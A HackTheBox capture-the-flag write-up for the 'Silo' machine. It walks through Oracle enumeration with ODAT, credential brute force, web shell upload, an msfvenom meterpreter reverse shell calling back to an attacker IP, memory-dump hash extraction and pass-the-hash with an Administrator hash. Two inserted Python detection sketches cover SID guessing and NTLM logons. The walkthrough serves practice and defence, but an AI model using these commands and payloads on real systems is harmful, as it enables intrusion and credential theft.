HacktheBox - Silo Writeup

10/01/2020

Zero to OSCP Hero Writeup #18 - Silo  

Reconnaissance

1. Nmap Scan - Common Ports TCP Scan

Let's start with a TCP scan of the target IP address to determine which common ports are open and which services are running on those ports:

nmap -sC -sV -oA nmap/initial.tcp 10.10.10.82

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -oA: Output the result of the scan in all formats as nmap/initial.tcp

From the scan we can see that ports 80, 135, 139 and 445 are open and, most notably, port 1521, which is the default port Oracle databases listen on.

2. Nmap Scan - All TCP Ports Scan

Okay, let's scan the entire TCP port range to confirm that there are no other ports open:

nmap -sC -sV -p- -oA nmap/full.tcp 10.10.10.82

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.tcp

The full TCP scan confirmed that there is one additional port open, port 5985. 

3. Nmap Scan - All UDP Ports Scan

We can do the same full port scan, but with the UDP ports:

nmap -sU -p- -oA nmap/full.udp 10.10.10.82

  • -sU: Run the scan against UDP ports
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.udp

The full UDP scan confirmed that there are a few ports which are open|filtered. 

Enumeration - Port 80

1. Browse to 10.10.10.82

So all we are presented with is the default IIS 8.5 page, nothing exciting here! 

2. Gobuster of 10.10.10.82

Let's see if there are any hidden files or directories:

gobuster dir -u 10.10.10.82 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,asp,aspx,php

Unfortunately, gobuster doesn't find anything. This indicates that port 1521 is the most likely route to exploiting this box.

Enumeration - Port 1521

Port 1521 is the default port that Oracle databases listen on, so let's see what information we can gather!

1. Talk to the TNS-Listener

The first step in enumerating Oracle is to talk to the TNS-Listener, which by default listens on TCP port 1521. We will use the tool tnscmd10g, which can give us some useful information about the Oracle database.

./tnscmd10g status -h 10.10.10.82

As you can see, we are getting errors as the database is most likely password protected. 

2. Oracle Database Attacking Tool - ODAT

Let's see if we can get any further by using a tool called ODAT. ODAT is an open source penetration testing tool that tests the security of Oracle databases remotely.

2.1 Installation of ODAT

ODAT is not plug and play out of the box; there are some steps needed to install it properly. I found this guide extremely helpful.

2.2 SID Brute Force 

An Oracle SID is used to uniquely identify a particular Oracle database on the machine.

We can use ODAT and its sidguesser module to potentially find the Oracle databases on the machine:

./odat.py sidguesser -s 10.10.10.82

So sidguesser has found some valid SIDs! 
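
From the defender's side, the SID guessing in this step shows up in the listener log: each wrong SID is recorded as an establish record ending in result code 12505. The Python sketch below is an added example, not part of the original writeup or of ODAT. It assumes listener logging is enabled in the classic text listener.log format; the log lines, threshold and function name are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed listener.log lines (not taken from the target).
SAMPLE_LOG = """\
10-JAN-2020 10:00:01 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=c1)(USER=u))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.59)(PORT=40112)) * establish * ORCL * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
10-JAN-2020 10:00:01 * (CONNECT_DATA=(SID=PROD)(CID=(PROGRAM=)(HOST=c1)(USER=u))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.59)(PORT=40113)) * establish * PROD * 12505
10-JAN-2020 10:00:02 * (CONNECT_DATA=(SID=TEST)(CID=(PROGRAM=)(HOST=c1)(USER=u))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.59)(PORT=40114)) * establish * TEST * 12505
10-JAN-2020 10:00:02 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=)(HOST=c1)(USER=u))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.59)(PORT=40115)) * establish * XE * 0
10-JAN-2020 10:05:00 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=app.exe)(HOST=web01)(USER=svc))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.10.20)(PORT=51000)) * establish * XE * 0
10-JAN-2020 10:06:00 * (CONNECT_DATA=(SID=XEE)(CID=(PROGRAM=app.exe)(HOST=web01)(USER=svc))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.10.20)(PORT=51001)) * establish * XEE * 12505
"""

# Establish record: ... * (ADDRESS=...(HOST=<client ip>)...) * establish * <SID> * <result code>
ESTABLISH = re.compile(
    r"\(ADDRESS=.*?\(HOST=(?P<src>[^)]+)\).*?\)\s*\*\s*establish\s*\*\s*"
    r"(?P<sid>\S+)\s*\*\s*(?P<code>\d+)\s*$"
)


def sid_guessing_sources(log_text, min_unknown_sids=3):
    """Return {source: sorted unknown SIDs} for sources that received
    TNS-12505 (unknown SID) on at least min_unknown_sids distinct SIDs."""
    unknown = defaultdict(set)
    for line in log_text.splitlines():
        m = ESTABLISH.search(line)
        if m and m.group("code") == "12505":
            unknown[m.group("src")].add(m.group("sid"))
    return {src: sorted(sids) for src, sids in unknown.items()
            if len(sids) >= min_unknown_sids}


if __name__ == "__main__":
    for src, sids in sid_guessing_sources(SAMPLE_LOG).items():
        print(f"{src}: {len(sids)} unknown SIDs tried: {', '.join(sids)}")
```

A single mistyped SID from an application host (the XEE line) stays below the threshold, while one source cycling through many SIDs is reported.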

2.3 Credential Brute Force 

Now that we have a list of valid SIDs, we need to find credentials that can access the databases. This is where we will use the Metasploit module oracle_login to try to brute force the database creds:

use auxiliary/admin/oracle/oracle_login

set rhosts 10.10.10.82

set SID XE

run -j

So we have brute forced credentials to the XE database! :D 

We would also have found the creds if we had looked at the default Oracle account creds.

2.4 Connect to the XE Oracle database

Now that we know the Oracle database and credentials, we can finally log in to the database and manually enumerate the contents:

sqlplus scott/tiger@10.10.10.82:1521/XE

We can also try to log in as SYSDBA, which is usually for fully empowered database administrators!

sqlplus scott/tiger@10.10.10.82:1521/XE as sysdba

And it worked! We are now running with sysdba privs.

2.5 Check Oracle Version

select * from v$Version;

2.6 Check Database User Permissions

select * from user_role_privs;

As you can see, because we are running as sysdba, we have a lot of privileges!

2.7 Running ODAT file upload module

We can run ODAT once again; this time let's see if we can upload files with the module utlfile.

First, let's create a file to test the file upload capability:

echo "this is a test" > test.txt

./odat.py dbmsxslprocessor -s 10.10.10.82 -d XE -U SCOTT -P tiger --putFile 'C:\inetpub\wwwroot\' 'uploaded.txt' /opt/odat/test.txt --sysdba

Now let's see if we can access the file we created on the machine's web server:

curl http://10.10.10.82/uploaded.txt

Yes! We have confirmed that we are able to upload and execute files on the machine's web server via the Oracle database.

Initial Foothold - User

1. Upload a shell 

Let's create a reverse https shell with msfvenom:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.59 LPORT=9001 -f aspx > shell.aspx

1.1 Upload the aspx payload

We can use the same method as before with the test file to upload to the web server:

./odat.py dbmsxslprocessor -s 10.10.10.82 -d XE -U SCOTT -P tiger --putFile 'C:\inetpub\wwwroot\' 'shell.aspx' /root/Desktop/htb/boxes/silo/shell.aspx --sysdba

2. Start /multi/handler 

Let's start a /multi/handler ready for the connection from the machine:

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_https 

set LHOST 10.10.14.59

set LPORT 9001

3. Execute the shell

Now we can browse to our created aspx payload:

http://10.10.10.82/shell.aspx

...And we have a meterpreter session! 

4. Grab the user.txt flag 

The flag is located in the home directory of the user Phineas.

Privilege Escalation - Admin

1. Oracle Issue.txt 

Along with the user.txt file in Phineas' desktop folder, there is a txt file called 'oracle issue.txt'.

As you can see, we are given a link to a memory dump on Dropbox, with the password needed to grab the memory dump. (The first encoded char is the £ symbol.)

1.1 Download dump from dropbox

Click on the dropbox link given in the file, and use the password provided to gain access. We see that there is a .zip file and if you click into it, we see the .dmp file. 

Download the .zip file to our machine and use the unzip command on the archive:

unzip SILO-20180105-221806.zip

2. Analyzing the dump with Volatility

Volatility is used for the extraction of digital artifacts from volatile memory (RAM) samples, meaning we can use the tool to find some information to help us to root!  

2.1 Inspect the processes

Volatility can be used for a wide range of analysis, including a list of the running processes at the time of the dump creation: 

volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 pslist

From the running processes, we can see one called Dumpit.exe. Dumpit is a forensics tool used to create memory dumps, which is what looks to have been used for the machine. It may even have been run by admin, so let's again use Volatility's tricks and acquire the hashes of the users on the machine!

2.2 Find the user hashes - hivelist

In order to find the user hashes on the machine, we need a few more bits of information, starting with the hivelist, which will give us the memory addresses of SYSTEM and SAM.

The hive list will give us the starting location in memory of where the registry information resides:

volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hivelist

We only need to take note of the first column for SYSTEM and SAM. 

SYSTEM= 0xffffc00000028000

SAM= 0xffffc00000619000

2.3 Output hashes to a file

We can now use volatility to create a hash text file with the registry information found: 

volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 -y 0xffffc00000028000 -s 0xffffc00000619000 hashdump > hashes.txt

cat hashes.txt 

3. Pass the Hash with pth-winexe

We can now use a tool called pth-winexe to gain access to the machine with the administrator's hash.

We first need to edit the hash by removing the ':500:' and replacing it with a '%'.

pth-winexe -U "Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::" //10.10.10.82 cmd
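
On the target, a logon like this one is recorded as a Security 4624 event (network logon, NTLM) for the built-in Administrator, and winexe runs its command by installing a service, which the System log records as event 7045. The Python sketch below is an added example, not part of the original writeup. It correlates the two over events already parsed into dictionaries; the event values, window and function names are constructed, and a 4624 record does not reveal whether a hash or a password was presented, so this is a triage heuristic.

```python
from datetime import datetime

# Constructed events reduced to the fields used below. Field names follow
# Security event 4624 and System event 7045; every value is made up.
EVENTS = [
    {"time": "2020-01-10T11:00:00", "id": 4624, "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "Administrator",
     "TargetUserSid": "S-1-5-21-1111-2222-3333-500", "IpAddress": "10.10.14.59"},
    {"time": "2020-01-10T11:00:02", "id": 7045, "ServiceName": "winexesvc"},
    {"time": "2020-01-10T12:00:00", "id": 4624, "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "TargetUserName": "backup",
     "TargetUserSid": "S-1-5-21-1111-2222-3333-1104", "IpAddress": "10.10.10.20"},
    {"time": "2020-01-10T12:00:05", "id": 7045, "ServiceName": "UpdaterSvc"},
    {"time": "2020-01-10T13:00:00", "id": 4624, "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "Administrator",
     "TargetUserSid": "S-1-5-21-1111-2222-3333-500", "IpAddress": "10.10.10.30"},
]


def is_ntlm_rid500_network_logon(ev):
    """Network (type 3) NTLM logon by the built-in Administrator (RID 500)."""
    return (ev["id"] == 4624 and ev.get("LogonType") == 3
            and ev.get("AuthenticationPackageName") == "NTLM"
            and ev.get("TargetUserSid", "").endswith("-500"))


def logon_then_service_install(events, window_seconds=30):
    """Pair each matching logon with services installed (7045) shortly after."""
    alerts = []
    ordered = sorted(events, key=lambda e: e["time"])
    for i, ev in enumerate(ordered):
        if not is_ntlm_rid500_network_logon(ev):
            continue
        start = datetime.fromisoformat(ev["time"])
        for later in ordered[i + 1:]:
            delta = (datetime.fromisoformat(later["time"]) - start).total_seconds()
            if delta > window_seconds:
                break
            if later["id"] == 7045:
                alerts.append((ev["IpAddress"], ev["TargetUserName"],
                               later["ServiceName"]))
    return alerts


if __name__ == "__main__":
    for src, user, service in logon_then_service_install(EVENTS):
        print(f"NTLM logon as {user} from {src}, then service '{service}' installed")
```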

4. Grab the root.txt file 

Conclusion

I've not had much experience with Oracle DB exploitation or the use of Volatility before the machine; it was a learning curve, but one that will help me in both HTB and in real engagements. Nice box!

Thanks for reading, Next up is Box #19 - Solidstate!